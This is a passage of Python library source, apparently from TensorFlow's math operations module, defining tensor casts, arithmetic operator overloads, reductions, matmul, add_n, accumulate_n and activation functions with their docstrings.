return cast(x, dtypes.int32, name=name)
def to_int64(x, name="ToInt64"):
"""Casts a tensor to type `int64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int64`.
Raises:
TypeError: If `x` cannot be cast to the `int64`.
"""
return cast(x, dtypes.int64, name=name)
def to_bfloat16(x, name="ToBFloat16"):
"""Casts a tensor to type `bfloat16`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `bfloat16`.
Raises:
TypeError: If `x` cannot be cast to the `bfloat16`.
"""
return cast(x, dtypes.bfloat16, name=name)
ops.Tensor._override_operator("__neg__", gen_math_ops.neg)
ops.Tensor._override_operator("__abs__", abs)
# __invert__ corresponds to the ~ operator. Here we follow the numpy convention
# ~ marks an elementwise bit-wise inverse. This is only implemented for boolean
# tensors and will throw a TypeError if used on nonboolean arrays
ops.Tensor._override_operator("__invert__", gen_math_ops.logical_not)
def _OverrideBinaryOperatorHelper(func, op_name, clazz_object=ops.Tensor):
"""Register operators with different tensor and scalar versions.
If `clazz_object` is `SparseTensor`, assumes `func` takes `(sp_indices,
sp_values, sp_shape, dense)` and outputs `(new_sp_values)`.
Args:
func: the operator
op_name: name of the operator being overridden
clazz_object: class to override for. Either `Tensor` or `SparseTensor`.
"""
def binary_op_wrapper(x, y):
with ops.name_scope(None, op_name, [x, y]) as name:
if not isinstance(y, ops.SparseTensor):
y = ops.convert_to_tensor(y, dtype=x.dtype.base_dtype, name="y")
return func(x, y, name=name)
def binary_op_wrapper_sparse(sp_x, y):
with ops.name_scope(None, op_name, [sp_x, y]) as name:
y = ops.convert_to_tensor(y, dtype=sp_x.dtype.base_dtype, name="y")
return ops.SparseTensor(sp_x.indices, func(sp_x.indices, sp_x.values,
sp_x.shape, y, name=name),
sp_x.shape)
def r_binary_op_wrapper(y, x):
with ops.name_scope(None, op_name, [x, y]) as name:
x = ops.convert_to_tensor(x, dtype=y.dtype.base_dtype, name="x")
return func(x, y, name=name)
# Propagate func.__doc__ to the wrappers
try:
doc = func.__doc__
except AttributeError:
doc = None
binary_op_wrapper.__doc__ = doc
r_binary_op_wrapper.__doc__ = doc
binary_op_wrapper_sparse.__doc__ = doc
if clazz_object is ops.Tensor:
clazz_object._override_operator("__%s__" % op_name, binary_op_wrapper)
del binary_op_wrapper
clazz_object._override_operator("__r%s__" % op_name, r_binary_op_wrapper)
del r_binary_op_wrapper
else:
clazz_object._override_operator("__%s__" % op_name,
binary_op_wrapper_sparse)
del binary_op_wrapper_sparse
# Conversion table for __truediv__. None entries mean no conversion required.
_TRUEDIV_TABLE = {
dtypes.uint8: dtypes.float32,
dtypes.int8: dtypes.float32,
dtypes.uint16: dtypes.float32,
dtypes.int16: dtypes.float32,
dtypes.int32: dtypes.float64,
dtypes.int64: dtypes.float64,
dtypes.float16: None,
dtypes.float32: None,
dtypes.float64: None,
dtypes.complex64: None,
dtypes.complex128: None,
}
# NOTE: the support of "sparse (true)div dense" is currently not baked in into
# "tf.(true_)div()". Until such an API decision is made, the supported usage is
# to explicitly use the "/" operator to invoke either truediv or div.
def _sparse_dense_truediv(sp_indices, sp_values, sp_shape, y, name=None):
"""Internal helper function for 'sp_t / dense_t'."""
with ops.name_scope(name, "truediv",
[sp_indices, sp_values, sp_shape, y]) as name:
sp_values = ops.convert_to_tensor(sp_values, name="sp_values")
y = ops.convert_to_tensor(y, name="y")
x_dtype = sp_values.dtype.base_dtype
y_dtype = y.dtype.base_dtype
if x_dtype != y_dtype:
raise TypeError("x and y must have the same dtype, got %r != %r" %
(x_dtype, y_dtype))
try:
dtype = _TRUEDIV_TABLE[x_dtype]
except KeyError:
raise TypeError("Invalid dtype %r in __truediv__" % x_dtype)
if dtype is not None:
sp_values = cast(sp_values, dtype)
y = cast(y, dtype)
return gen_sparse_ops.sparse_dense_cwise_div(sp_indices, sp_values,
sp_shape, y, name=name)
def truediv(x, y, name=None):
"""Divides x / y elementwise, always producing floating point results.
The same as `tf.div` for floating point arguments, but casts integer arguments
to floating point before dividing so that the result is always floating point.
This op is generated by normal `x / y` division in Python 3 and in Python 2.7
with `from __future__ import division`. If you want integer division that
rounds down, use `x // y` or `tf.floordiv`.
`x` and `y` must have the same numeric type. If the inputs are floating
point, the output will have the same type. If the inputs are integral, the
inputs are cast to `float32` for `int8` and `int16` and `float64` for `int32`
and `int64` (matching the behavior of Numpy).
Args:
x: `Tensor` numerator of numeric type.
y: `Tensor` denominator of numeric type.
name: A name for the operation (optional).
Returns:
`x / y` evaluated in floating point.
Raises:
TypeError: If `x` and `y` have different dtypes.
"""
with ops.name_scope(name, "truediv", [x, y]) as name:
x = ops.convert_to_tensor(x, name="x")
y = ops.convert_to_tensor(y, name="y")
x_dtype = x.dtype.base_dtype
y_dtype = y.dtype.base_dtype
if x_dtype != y_dtype:
raise TypeError("x and y must have the same dtype, got %r != %r" %
(x_dtype, y_dtype))
try:
dtype = _TRUEDIV_TABLE[x_dtype]
except KeyError:
raise TypeError("Invalid dtype %r in __truediv__" % x_dtype)
if dtype is not None:
x = cast(x, dtype)
y = cast(y, dtype)
return gen_math_ops.div(x, y, name=name)
def floordiv(x, y, name=None):
"""Divides `x / y` elementwise, rounding down for floating point.
The same as `tf.div(x,y)` for integers, but uses `tf.floor(tf.div(x,y))` for
floating point arguments so that the result is always an integer (though
possibly an integer represented as floating point). This op is generated by
`x // y` floor division in Python 3 and in Python 2.7 with
`from __future__ import division`.
Note that for efficiency, `floordiv` uses C semantics for negative numbers
(unlike Python and Numpy).
`x` and `y` must have the same type, and the result will have the same type
as well.
Args:
x: `Tensor` numerator of real numeric type.
y: `Tensor` denominator of real numeric type.
name: A name for the operation (optional).
Returns:
`x / y` rounded down (except possibly towards zero for negative integers).
Raises:
TypeError: If the inputs are complex.
"""
with ops.name_scope(name, "floordiv", [x, y]) as name:
x = ops.convert_to_tensor(x, name="x")
dtype = x.dtype
if dtype.is_floating:
return gen_math_ops.floor(gen_math_ops.div(x, y), name=name)
else:
if not dtype.is_integer:
raise TypeError("Expected floating point or integer, got %r" % dtype)
# TODO(aselle): Switch to math_ops.floor_div() when ready
# return gen_math_ops.floor_div(x, y, name=name)
return gen_math_ops.div(x, y, name=name)
def _mul_dispatch(x, y, name=None):
"""Dispatches cwise mul for "Dense*Dense" and "Dense*Sparse"."""
is_tensor_y = isinstance(y, ops.Tensor)
if is_tensor_y:
return gen_math_ops.mul(x, y, name=name)
else:
assert isinstance(y, ops.SparseTensor) # Case: Dense * Sparse.
new_vals = gen_sparse_ops.sparse_dense_cwise_mul(y.indices, y.values,
y.shape, x, name)
return ops.SparseTensor(y.indices, new_vals, y.shape)
_OverrideBinaryOperatorHelper(gen_sparse_ops.sparse_dense_cwise_div, "div",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(_sparse_dense_truediv, "truediv",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(gen_sparse_ops.sparse_dense_cwise_mul, "mul",
ops.SparseTensor)
_OverrideBinaryOperatorHelper(gen_math_ops.add, "add")
_OverrideBinaryOperatorHelper(gen_math_ops.sub, "sub")
_OverrideBinaryOperatorHelper(_mul_dispatch, "mul")
_OverrideBinaryOperatorHelper(gen_math_ops.div, "div")
_OverrideBinaryOperatorHelper(truediv, "truediv")
_OverrideBinaryOperatorHelper(floordiv, "floordiv")
# TODO(aselle): Switch mod to floor_mod when ready
# _OverrideBinaryOperatorHelper(gen_math_ops.floor_mod, "mod")
_OverrideBinaryOperatorHelper(gen_math_ops.mod, "mod")
_OverrideBinaryOperatorHelper(pow, "pow")
def logical_xor(x, y, name="LogicalXor"):
"""x ^ y = (x | y) & ~(x & y)."""
# TODO(alemi) Make this a cwise op if people end up relying on it.
return gen_math_ops.logical_and(
gen_math_ops.logical_or(x, y),
gen_math_ops.logical_not(gen_math_ops.logical_and(x, y)),
name=name)
_OverrideBinaryOperatorHelper(gen_math_ops.logical_and, "and")
_OverrideBinaryOperatorHelper(gen_math_ops.logical_or, "or")
_OverrideBinaryOperatorHelper(logical_xor, "xor")
ops.Tensor._override_operator("__lt__", gen_math_ops.less)
ops.Tensor._override_operator("__le__", gen_math_ops.less_equal)
ops.Tensor._override_operator("__gt__", gen_math_ops.greater)
ops.Tensor._override_operator("__ge__", gen_math_ops.greater_equal)
def range(start, limit=None, delta=1, dtype=None, name="range"):
"""Creates a sequence of numbers.
Creates a sequence of numbers that begins at `start` and extends by
increments of `delta` up to but not including `limit`.
The dtype of the resulting tensor is inferred from the inputs unless
it is provided explicitly.
Like the Python builtin `range`, `start` defaults to 0, so that
`range(n) = range(0, n)`.
For example:
```python
# 'start' is 3
# 'limit' is 18
# 'delta' is 3
tf.range(start, limit, delta) ==> [3, 6, 9, 12, 15]
# 'start' is 3
# 'limit' is 1
# 'delta' is -0.5
tf.range(start, limit, delta) ==> [3, 2.5, 2, 1.5]
# 'limit' is 5
tf.range(limit) ==> [0, 1, 2, 3, 4]
```
Args:
start: A 0-D `Tensor` (scalar). Acts as first entry in the range if
`limit` is not None; otherwise, acts as range limit and first entry
defaults to 0.
limit: A 0-D `Tensor` (scalar). Upper limit of sequence,
exclusive. If None, defaults to the value of `start` while the first
entry of the range defaults to 0.
delta: A 0-D `Tensor` (scalar). Number that increments
`start`. Defaults to 1.
dtype: The type of the elements of the resulting tensor.
name: A name for the operation. Defaults to "range".
Returns:
An 1-D `Tensor` of type `dtype`.
"""
if limit is None:
start, limit = 0, start
with ops.name_scope(name, "Range", [start, limit, delta]) as name:
start = ops.convert_to_tensor(start, dtype=dtype, name="start")
limit = ops.convert_to_tensor(limit, dtype=dtype, name="limit")
delta = ops.convert_to_tensor(delta, dtype=dtype, name="delta")
# infer dtype if not explicitly provided
if dtype is None:
dtype_hierarchy = [dtypes.int32, dtypes.int64, dtypes.float32,
dtypes.float64]
assert all(arg.dtype in dtype_hierarchy for arg in [start, limit, delta])
inferred_dtype = max([arg.dtype for arg in [start, limit, delta]],
key=dtype_hierarchy.index)
start = cast(start, inferred_dtype)
limit = cast(limit, inferred_dtype)
delta = cast(delta, inferred_dtype)
return gen_math_ops._range(start, limit, delta, name=name)
@ops.RegisterShape("Range")
def _RangeShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[0, 1, 2])
# Reduction operations
def _ReductionDims(x, reduction_indices):
"""Returns range(0, rank(x)) if reduction_indices is None."""
if reduction_indices is not None:
return reduction_indices
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if isinstance(x, ops.Tensor) and x.get_shape().ndims is not None:
return constant_op.constant(np.arange(x.get_shape().ndims),
dtype=dtypes.int32)
if (isinstance(x, ops.SparseTensor) and
x.shape.get_shape().is_fully_defined()):
rank = x.shape.get_shape()[0].value # sparse.shape is an 1-D tensor.
return constant_op.constant(np.arange(rank), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return range(0, array_ops.rank(x))
def reduce_sum(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the sum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1, 1, 1]
# [1, 1, 1]]
tf.reduce_sum(x) ==> 6
tf.reduce_sum(x, 0) ==> [2, 2, 2]
tf.reduce_sum(x, 1) ==> [3, 3]
tf.reduce_sum(x, 1, keep_dims=True) ==> [[3], [3]]
tf.reduce_sum(x, [0, 1]) ==> 6
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._sum(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def count_nonzero(input_tensor, reduction_indices=None, keep_dims=False,
dtype=dtypes.int64, name=None):
"""Computes number of nonzero elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
**NOTE** Floating point comparison to zero is done by exact floating point
equality check. Small values are **not** rounded to zero for purposes of
the nonzero check.
For example:
```python
# 'x' is [[0, 1, 0]
# [1, 1, 0]]
tf.count_nonzero(x) ==> 3
tf.count_nonzero(x, 0) ==> [1, 2, 0]
tf.count_nonzero(x, 1) ==> [1, 2]
tf.count_nonzero(x, 1, keep_dims=True) ==> [[1], [2]]
tf.count_nonzero(x, [0, 1]) ==> 3
```
Args:
input_tensor: The tensor to reduce. Should be of numeric type, or `bool`.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
dtype: The output dtype; defaults to `tf.int64`.
name: A name for the operation (optional).
Returns:
The reduced tensor (number of nonzero values).
"""
with ops.name_scope(name, "count_nonzero", [input_tensor]):
input_tensor = ops.convert_to_tensor(input_tensor, name="input_tensor")
zero = input_tensor.dtype.as_numpy_dtype()
return cast(
reduce_sum(
# int64 reduction happens on GPU
to_int64(gen_math_ops.not_equal(input_tensor, zero)),
reduction_indices=reduction_indices,
keep_dims=keep_dims),
dtype=dtype)
def reduce_mean(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the mean of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1., 1.]
# [2., 2.]]
tf.reduce_mean(x) ==> 1.5
tf.reduce_mean(x, 0) ==> [1.5, 1.5]
tf.reduce_mean(x, 1) ==> [1., 2.]
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._mean(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_prod(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the product of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._prod(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_min(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the minimum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._min(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_max(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the maximum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._max(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_all(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical and" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]
# [False, False]]
tf.reduce_all(x) ==> False
tf.reduce_all(x, 0) ==> [False, False]
tf.reduce_all(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._all(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_any(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical or" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]
# [False, False]]
tf.reduce_any(x) ==> True
tf.reduce_any(x, 0) ==> [True, True]
tf.reduce_any(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._any(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_logsumexp(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes log(sum(exp(elements across dimensions of a tensor))).
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
This function is more numerically stable than log(sum(exp(input))). It avoids
overflows caused by taking the exp of large inputs and underflows caused by
taking the log of small inputs.
For example:
```python
# 'x' is [[0, 0, 0]]
# [0, 0, 0]]
tf.reduce_logsumexp(x) ==> log(6)
tf.reduce_logsumexp(x, 0) ==> [log(2), log(2), log(2)]
tf.reduce_logsumexp(x, 1) ==> [log(3), log(3)]
tf.reduce_logsumexp(x, 1, keep_dims=True) ==> [[log(3)], [log(3)]]
tf.reduce_logsumexp(x, [0, 1]) ==> log(6)
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
with ops.name_scope(name, "ReduceLogSumExp", [input_tensor]) as name:
my_max = array_ops.stop_gradient(
reduce_max(input_tensor, reduction_indices, keep_dims=True))
result = gen_math_ops.log(reduce_sum(
gen_math_ops.exp(input_tensor - my_max),
reduction_indices,
keep_dims=True)) + my_max
if not keep_dims:
result = array_ops.squeeze(result, reduction_indices)
return result
def trace(x, name=None):
""" Compute the trace of a tensor `x`.
`trace(x)` returns the sum along the main diagonal of each inner-most matrix
in x. If x is of rank `k` with shape `[I, J, K, ..., L, M, N]`, then output
is a tensor of rank `k-2` with dimensions `[I, J, K, ..., L]` where
`output[i, j, k, ..., l] = trace(x[i, j, i, ..., l, :, :])`
For example:
```python
# 'x' is [[1, 2],
# [3, 4]]
tf.trace(x) ==> 5
# 'x' is [[1,2,3],
# [4,5,6],
# [7,8,9]]
tf.trace(x) ==> 15
# 'x' is [[[1,2,3],
# [4,5,6],
# [7,8,9]],
# [[-1,-2,-3],
# [-4,-5,-6],
# [-7,-8,-9]]]
tf.trace(x) ==> [15,-15]
```
Args:
x: tensor.
name: A name for the operation (optional).
Returns:
The trace of input tensor.
"""
with ops.name_scope(name, "Trace", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return reduce_sum(array_ops.matrix_diag_part(x), [-1], name=name)
def matmul(a, b,
transpose_a=False, transpose_b=False,
a_is_sparse=False, b_is_sparse=False,
name=None):
"""Multiplies matrix `a` by matrix `b`, producing `a` * `b`.
The inputs must be two-dimensional matrices, with matching inner dimensions,
possibly after transposition.
Both matrices must be of the same type. The supported types are:
`float32`, `float64`, `int32`, `complex64`.
Either matrix can be transposed on the fly by setting the corresponding flag
to `True`. This is `False` by default.
If one or both of the matrices contain a lot of zeros, a more efficient
multiplication algorithm can be used by setting the corresponding
`a_is_sparse` or `b_is_sparse` flag to `True`. These are `False` by default.
For example:
```python
# 2-D tensor `a`
a = tf.constant([1, 2, 3, 4, 5, 6], shape=[2, 3]) => [[1. 2. 3.]
[4. 5. 6.]]
# 2-D tensor `b`
b = tf.constant([7, 8, 9, 10, 11, 12], shape=[3, 2]) => [[7. 8.]
[9. 10.]
[11. 12.]]
c = tf.matmul(a, b) => [[58 64]
[139 154]]
```
Args:
a: `Tensor` of type `float32`, `float64`, `int32` or `complex64`.
b: `Tensor` with same type as `a`.
transpose_a: If `True`, `a` is transposed before multiplication.
transpose_b: If `True`, `b` is transposed before multiplication.
a_is_sparse: If `True`, `a` is treated as a sparse matrix.
b_is_sparse: If `True`, `b` is treated as a sparse matrix.
name: Name for the operation (optional).
Returns:
A `Tensor` of the same type as `a`.
"""
with ops.name_scope(name, "MatMul", [a, b]) as name:
a = ops.convert_to_tensor(a, name="a")
b = ops.convert_to_tensor(b, name="b")
sparse_matmul_types = [dtypes.bfloat16, dtypes.float32]
use_sparse_matmul = (a.dtype in sparse_matmul_types and
b.dtype in sparse_matmul_types and
(a_is_sparse or b_is_sparse))
if dtypes.bfloat16 in (a.dtype, b.dtype):
# matmul currently doesn't handle bfloat16 inputs.
use_sparse_matmul = True
if use_sparse_matmul:
return sparse_matmul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=a_is_sparse,
b_is_sparse=b_is_sparse,
name=name)
else:
return gen_math_ops._mat_mul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
name=name)
sparse_matmul = gen_math_ops._sparse_mat_mul
batch_matmul = gen_math_ops._batch_mat_mul
ops.RegisterShape("MatMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseMatMul")(common_shapes.call_cpp_shape_fn)
@ops.RegisterStatistics("MatMul", "flops")
def _calc_mat_mul_flops(graph, node):
"""Calculates the compute resources needed for MatMul."""
transpose_a = node.attr["transpose_a"].b
a_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
a_shape.assert_is_fully_defined()
if transpose_a:
k = int(a_shape[0])
else:
k = int(a_shape[1])
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
output_count = np.prod(output_shape.as_list())
return ops.OpStats("flops", (k * output_count * 2))
@ops.RegisterStatistics("MatMul", "weight_parameters")
def _calc_mat_mul_weight_parameters(graph, node):
"""Calculates the on-disk size of the weights for MatMul."""
# We assume here that the weights are always in the second input to the op,
# which is generally true by convention for fully-connected layers, but not
# enforced or checked.
weights_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
weights_shape.assert_is_fully_defined()
return ops.OpStats("weight_parameters",
(int(weights_shape[1]) * int(weights_shape[0])))
def _as_indexed_slices(x, optimize=True):
"""Convert 'x' to IndexedSlices.
Convert a dense Tensor to a block-sparse IndexedSlices.
Args:
x: Either a Tensor object, or an IndexedSlices object.
optimize: if true, attempt to optimize the conversion of 'x'.
Returns:
An IndexedSlices object.
Raises:
TypeError: If 'x' is not a Tensor or an IndexedSlices object.
"""
# TODO(touts): op_scope
if not isinstance(x, (ops.Tensor, ops.IndexedSlices)):
raise TypeError("Not a Tensor or IndexedSlices: %s" % type(x))
if isinstance(x, ops.IndexedSlices):
return x
x_shape = array_ops.shape_internal(x, optimize=optimize)
return ops.IndexedSlices(x, range(0, x_shape[0]), x_shape)
def _as_indexed_slices_list(inputs, optimize=True):
"""Convert all elements of 'inputs' to IndexedSlices.
Additionally, homogenize the types of all the indices to
either int32 or int64.
Args:
inputs: List containing either Tensor or IndexedSlices objects.
optimize: if true, attempt to optimize the conversion of each input.
Returns:
A list of IndexedSlices objects.
Raises:
TypeError: If 'inputs' is not a list or a tuple.
"""
if not isinstance(inputs, (list, tuple)):
raise TypeError("Expected a list or tuple, not a %s" % type(inputs))
outputs = [_as_indexed_slices(i, optimize=optimize) for i in inputs]
with_int32_index = [o.indices for o in outputs
if o.indices.dtype == dtypes.int32]
if not with_int32_index or len(with_int32_index) == len(outputs):
return outputs
casted_outputs = []
for o in outputs:
if o.indices.dtype == dtypes.int32:
casted_outputs.append(
ops.IndexedSlices(o.values, cast(o.indices, dtypes.int64),
o.dense_shape))
else:
casted_outputs.append(o)
return casted_outputs
def add_n(inputs, name=None):
"""Adds all input tensors element-wise.
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
if not inputs or not isinstance(inputs, (list, tuple)):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if len(inputs) == 1:
if name:
return array_ops.identity(inputs[0], name=name)
return inputs[0]
return gen_math_ops._add_n(inputs, name=name)
def accumulate_n(inputs, shape=None, tensor_dtype=None, name=None):
"""Returns the element-wise sum of a list of tensors.
Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
otherwise, these are inferred.
NOTE: This operation is not differentiable and cannot be used if inputs depend
on trainable variables. Please use `tf.add_n` for such cases.
For example:
```python
# tensor 'a' is [[1, 2], [3, 4]]
# tensor `b` is [[5, 0], [0, 6]]
tf.accumulate_n([a, b, a]) ==> [[7, 4], [6, 14]]
# Explicitly pass shape and type
tf.accumulate_n([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
==> [[7, 4], [6, 14]]
```
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
shape: Shape of elements of `inputs`.
tensor_dtype: The type of `inputs`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
if not inputs or not isinstance(inputs, (list, tuple)):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if not all(x.dtype == inputs[0].dtype for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if shape is not None:
shape = tensor_shape.as_shape(shape)
else:
shape = tensor_shape.unknown_shape()
for input_tensor in inputs:
if isinstance(input_tensor, ops.Tensor):
shape = shape.merge_with(input_tensor.get_shape())
if len(inputs) == 1:
return inputs[0]
if tensor_dtype is None:
tensor_dtype = inputs[0].dtype
with ops.name_scope(name, "AccumulateN", inputs) as name:
var = gen_state_ops._temporary_variable(shape=tensor_shape.vector(0),
dtype=tensor_dtype)
with ops.colocate_with(var):
zeros = array_ops.zeros_like(gen_control_flow_ops._merge(inputs)[0])
zeros.set_shape(shape)
ref = state_ops.assign(var, zeros, validate_shape=False)
update_ops = [state_ops.assign_add(ref, input_tensor, use_locking=True)
for input_tensor in inputs]
with ops.control_dependencies(update_ops):
return gen_state_ops._destroy_temporary_variable(
ref, var_name=var.op.name, name=name)
ops.RegisterShape("BatchMatMul")(common_shapes.call_cpp_shape_fn)
def sigmoid(x, name=None):
"""Computes sigmoid of `x` element-wise.
Specifically, `y = 1 / (1 + exp(-x))`.
Args:
x: A Tensor with type `float32`, `float64`, `int32`, `complex64`, `int64`,
or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor with the same type as `x` if `x.dtype != qint32`
otherwise the return type is `quint8`.
"""
with ops.name_scope(name, "Sigmoid", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops._sigmoid(x, name=name)
def tanh(x, name=None):
"""Computes hyperbolic tangent of `x` element-wise.
Args:
x: A Tensor or SparseTensor with type `float`, `double`, `int32`,
`complex64`, `int64`, or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor or SparseTensor respectively with the same type as `x` if
`x.dtype != qint32` otherwise the return type is `quint8`.
"""
with ops.name_scope(name, "Tanh", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_tanh = gen_math_ops._tanh(x.values, name=name)
